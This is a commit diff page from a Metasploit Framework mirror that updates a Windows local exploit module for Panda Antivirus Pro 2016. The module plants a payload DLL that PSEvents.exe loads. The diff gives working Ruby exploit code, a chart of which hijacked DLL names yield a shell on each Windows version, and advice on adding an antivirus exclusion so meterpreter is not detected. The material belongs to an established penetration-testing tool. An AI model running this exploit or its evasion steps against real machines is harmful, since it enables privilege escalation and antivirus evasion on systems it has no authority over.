infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated dlls and docs

bug/bundler_fix
h00die 2016-10-20 20:45:50 -04:00
parent 3b548dc3cd
commit 12e4fe1c5c
2 changed files with 24 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
documentation/modules/exploit/windows/local/panda_psevents.md
View File

@ -2,9 +2,12 @@
Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe). Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action. The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear. The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
## Verification Steps ## Verification Steps
@ -24,7 +27,17 @@
**DLL** **DLL**
Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky. CRYPTBASE.dll seemed to work the best and is the default. Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details.
| | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
| 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no |
| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no |
| 32bit target (0), win7sp1 x86 | | | valid | | valid (caught by av) | |
In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell.
**ListenerTimeout** **ListenerTimeout**
@ -73,7 +86,7 @@
Name Current Setting Required Description Name Current Setting Required Description
---- --------------- -------- ----------- ---- --------------- -------- -----------
DLL CRYPTBASE.dll yes dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll) DLL CRYPTBASE.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
ListenerTimeout 3610 yes Number of seconds to wait for the exploit ListenerTimeout 3610 yes Number of seconds to wait for the exploit
SESSION 1 yes The session to run this module on. SESSION 1 yes The session to run this module on.

14
modules/exploits/windows/local/panda_psevents.rb
View File

@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local
)) ))
register_options( register_options(
[ [
OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll', OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll',
['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]), ['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]), OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
], self.class) ], self.class)
end end
@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Local
def get_path() def get_path()
case sysinfo['OS'] case sysinfo['OS']
when /Windows (7|8|10|2012|2008)/ when /Windows (7|8|10|2012|2008)/
return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\' return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
when /Windows (NT|XP)/ when /Windows (NT|XP)/
return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\' return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
end end
end end
def check def check
directory if directory?(get_path())
if directory(get_path())
print_good('Vuln path exists') print_good('Vuln path exists')
CheckCode::Appears CheckCode::Appears
else else
vprint_error("#{get_path()} doesn't exist on target")
CheckCode::Safe CheckCode::Safe
end end
end end
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("OS Detected as: #{sysinfo['OS']}") vprint_status("OS Detected as: #{sysinfo['OS']}")
payload_filepath = get_path() payload_filepath = get_path()
payload_filepath = "#{payload_filepath}#{datastore['DLL']}" payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}"
upload_payload_dll(payload_filepath) upload_payload_dll(payload_filepath)
# start the hour wait # start the hour wait